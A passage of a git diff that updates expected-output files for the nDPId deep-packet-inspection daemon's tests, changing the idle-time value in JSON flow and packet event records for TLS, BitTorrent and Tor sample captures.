HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","server_names":"*.utorrent.com,utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"CN=*.utorrent.com","fingerprint":"E4:8F:E4:15:C7:D0:B7:EA:E6:F6:B1:B4:40:F0:13:D1:5E:7F:64:E8"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":5906,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1639054407576} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7/7 diff --git a/test/results/tls_verylong_certificate.pcap.out b/test/results/tls_verylong_certificate.pcap.out index 1c20e32ac..b26fdbbf9 100644 --- a/test/results/tls_verylong_certificate.pcap.out +++ b/test/results/tls_verylong_certificate.pcap.out @@ -1,13 +1,13 @@ 00475{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1578254908457} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578254908457,"flow_last_seen":1578254908457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578254908457,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1578254908457,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578254908457,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGntnAqAGgl2VCMdYUAbur4+BEAAAAALAC\/\/9+XwAAAgQFtAEDAwUBAQgKAb+3BwAAAAAEAgAA"} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1578254908469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578254908469,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGqN2XZUIxwKgBoAG71hTYdp3Gq+PgRaASauCAYQAAAgQFZAQCCApynbuCAb+3BwEDAwk="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1578254908469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578254908469,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnuXAqAGgl2VCMdYUAbur4+BF2Hadx4AQEAgJrQAAAQEICgG\/txJynbuC"} -00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578254908457,"flow_last_seen":1578254908475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578254908475,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1885,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -03599{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":5989,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","server_names":"p2.shared.global.fastly.net,*.12wbt.com,*.2bleacherreport.com,*.3bleacherreport.com,*.4bleacherreport.com,*.8bleacherreport.com,*.abuse.ch,*.acdn-it.ps-pantheon.com,*.cdn.livingmap.com,*.content.plastiq.com,*.dimensions.ai,*.dollarshaveclub.co.uk,*.dollarshaveclub.com,*.dontpayfull.com,*.ebisubook.com,*.foreignaffairs.com,*.fs.jibjab.com,*.fs.unitprints.com,*.ggleap.com,*.goodeggs.com,*.huevosbuenos.com,*.indy.myomnigon.com,*.jwatch.org,*.kingsfordcharcoal.com.au,*.lancenters.com,*.madebywe.com,*.minirodini.com,*.modcloth.net,*.orionlabs.io,*.ps-pantheon.com,*.scodle.com,*.steelseries.com,*.theforeman.org,*.uploads.eversign.com,*.uploads.schoox.com,*.vts.com,*.x.stg1.ebisubook.com,*.yang2020.com,12wbt.com,2bleacherreport.com,3bleacherreport.com,4bleacherreport.com,8bleacherreport.com,abuse.ch,brita.com,cdn.fwupd.org,cdn.livingmap.com,cdn.seated.com,cdn.skillacademy.com,clinicaloptions.com,clorox.com,content-preprod.beaverbrooksweb2.co.uk,content.beaverbrooks.co.uk,content.plastiq.com,coolmathgames.com,copterroyale.coolmathgames.com,d8-dev.coolmathgames.com,deflyio.coolmathgames.com,delivery-api.evadacms.com,dimensions.ai,dollarshaveclub.co.uk,dollarshaveclub.com,dontpayfull.com,eluniverso.com,email.amg-group.co,email.tekoforlife.co.uk,feedmarket.fr,freshstep.com,ggleap.com,goodeggs.com,heap.io,huevosbuenos.com,identity.linuxfoundation.org,joebiden.com,jwatch.org,kingsford.co.nz,kingsfordcharcoal.com.au,lancenters.com,lists.linuxfoundation.org,m-stage.coolmathgames.com,m.coolmathgames.com,madebywe.com,minirodini.com,modcloth.net,orionlabs.io,puritanmedproducts.com,reviews.org,rg-video-staging.ruangguru.com,rg-video.ruangguru.com,ruangguru.com,scodle.com,stage.coolmathgames.com,staging.appblade.com,steelseries.com,stg.platform.eluniverso.com,test.brita.com,test.heap.io,test.joebiden.com,test.ruangguru.com,theforeman.org,video-cdn.quipper.com,videos.calcworkshop.com,vts.com,www.101network.com,www.autos101.com,www.brita.com,www.clorox.com,www.collider.com,www.coolmathgames.com,www.eluniverso.com,www.flinto.com,www.freshstep.com,www.heap.io,www.holagente.com,www.icsydney.com.au,www.joebiden.com,www.kingsford.co.nz,www.mrnatty.com,www.myjewellerystory.com.au,www.myjs.com,www.netacea.com,www.parenting101.com,www.puritanmedproducts.com,www.reviews.org,www.sba.sa,www.shashatcom.sa,www.uat.ontariocolleges.ca,www.vacation101.com,www.walterspeople.co.uk,www.westwayelectricsupply.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=p2.shared.global.fastly.net","alpn":"http\/1.1","fingerprint":"E9:34:DF:E0:C5:31:3C:59:7E:E2:57:44:F2:82:E9:80:F5:5D:05:4B"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578254908457,"flow_last_seen":1578254908551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":19077,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1578254908551,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578254908457,"flow_last_seen":1578254908457,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578254908457,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1578254908457,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578254908457,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGntnAqAGgl2VCMdYUAbur4+BEAAAAALAC\/\/9+XwAAAgQFtAEDAwUBAQgKAb+3BwAAAAAEAgAA"} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1578254908469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578254908469,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGqN2XZUIxwKgBoAG71hTYdp3Gq+PgRaASauCAYQAAAgQFZAQCCApynbuCAb+3BwEDAwk="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1578254908469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578254908469,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnuXAqAGgl2VCMdYUAbur4+BF2Hadx4AQEAgJrQAAAQEICgG\/txJynbuC"} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578254908457,"flow_last_seen":1578254908475,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578254908475,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1885,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +03599{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":5989,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","server_names":"p2.shared.global.fastly.net,*.12wbt.com,*.2bleacherreport.com,*.3bleacherreport.com,*.4bleacherreport.com,*.8bleacherreport.com,*.abuse.ch,*.acdn-it.ps-pantheon.com,*.cdn.livingmap.com,*.content.plastiq.com,*.dimensions.ai,*.dollarshaveclub.co.uk,*.dollarshaveclub.com,*.dontpayfull.com,*.ebisubook.com,*.foreignaffairs.com,*.fs.jibjab.com,*.fs.unitprints.com,*.ggleap.com,*.goodeggs.com,*.huevosbuenos.com,*.indy.myomnigon.com,*.jwatch.org,*.kingsfordcharcoal.com.au,*.lancenters.com,*.madebywe.com,*.minirodini.com,*.modcloth.net,*.orionlabs.io,*.ps-pantheon.com,*.scodle.com,*.steelseries.com,*.theforeman.org,*.uploads.eversign.com,*.uploads.schoox.com,*.vts.com,*.x.stg1.ebisubook.com,*.yang2020.com,12wbt.com,2bleacherreport.com,3bleacherreport.com,4bleacherreport.com,8bleacherreport.com,abuse.ch,brita.com,cdn.fwupd.org,cdn.livingmap.com,cdn.seated.com,cdn.skillacademy.com,clinicaloptions.com,clorox.com,content-preprod.beaverbrooksweb2.co.uk,content.beaverbrooks.co.uk,content.plastiq.com,coolmathgames.com,copterroyale.coolmathgames.com,d8-dev.coolmathgames.com,deflyio.coolmathgames.com,delivery-api.evadacms.com,dimensions.ai,dollarshaveclub.co.uk,dollarshaveclub.com,dontpayfull.com,eluniverso.com,email.amg-group.co,email.tekoforlife.co.uk,feedmarket.fr,freshstep.com,ggleap.com,goodeggs.com,heap.io,huevosbuenos.com,identity.linuxfoundation.org,joebiden.com,jwatch.org,kingsford.co.nz,kingsfordcharcoal.com.au,lancenters.com,lists.linuxfoundation.org,m-stage.coolmathgames.com,m.coolmathgames.com,madebywe.com,minirodini.com,modcloth.net,orionlabs.io,puritanmedproducts.com,reviews.org,rg-video-staging.ruangguru.com,rg-video.ruangguru.com,ruangguru.com,scodle.com,stage.coolmathgames.com,staging.appblade.com,steelseries.com,stg.platform.eluniverso.com,test.brita.com,test.heap.io,test.joebiden.com,test.ruangguru.com,theforeman.org,video-cdn.quipper.com,videos.calcworkshop.com,vts.com,www.101network.com,www.autos101.com,www.brita.com,www.clorox.com,www.collider.com,www.coolmathgames.com,www.eluniverso.com,www.flinto.com,www.freshstep.com,www.heap.io,www.holagente.com,www.icsydney.com.au,www.joebiden.com,www.kingsford.co.nz,www.mrnatty.com,www.myjewellerystory.com.au,www.myjs.com,www.netacea.com,www.parenting101.com,www.puritanmedproducts.com,www.reviews.org,www.sba.sa,www.shashatcom.sa,www.uat.ontariocolleges.ca,www.vacation101.com,www.walterspeople.co.uk,www.westwayelectricsupply.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=p2.shared.global.fastly.net","alpn":"http\/1.1","fingerprint":"E9:34:DF:E0:C5:31:3C:59:7E:E2:57:44:F2:82:E9:80:F5:5D:05:4B"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578254908457,"flow_last_seen":1578254908551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":19077,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1578254908551,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","packets-captured":48,"packets-processed":48,"total-skipped-flows":0,"total-l4-data-len":19077,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1578254908551} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 48/48 diff --git a/test/results/tor.pcap.out b/test/results/tor.pcap.out index 3a09c7731..fddc099ed 100644 --- a/test/results/tor.pcap.out +++ b/test/results/tor.pcap.out @@ -6,28 +6,28 @@ 00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00177{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":3,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821664212} 00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821665420,"flow_last_seen":1383821665420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821665420,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383821665420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665420,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A15AAIAGe0DAqAH8W49d8semAbvp\/8nSAAAAAIACIABVtgAAAgQFtAEDAwgBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383821665491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665491,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x6b4Wbj86f\/J04ASOQiLRwAAAgQFtAEBBAIBAwMH"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383821665491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821665491,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA19AAIAGe0vAqAH8W49d8semAbvp\/8nT+Fm4\/VAQAQAEIgAAAAAAAAAA"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821665420,"flow_last_seen":1383821665498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383821665498,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01160{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821665420,"flow_last_seen":1383821665606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383821665606,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821665420,"flow_last_seen":1383821665420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821665420,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 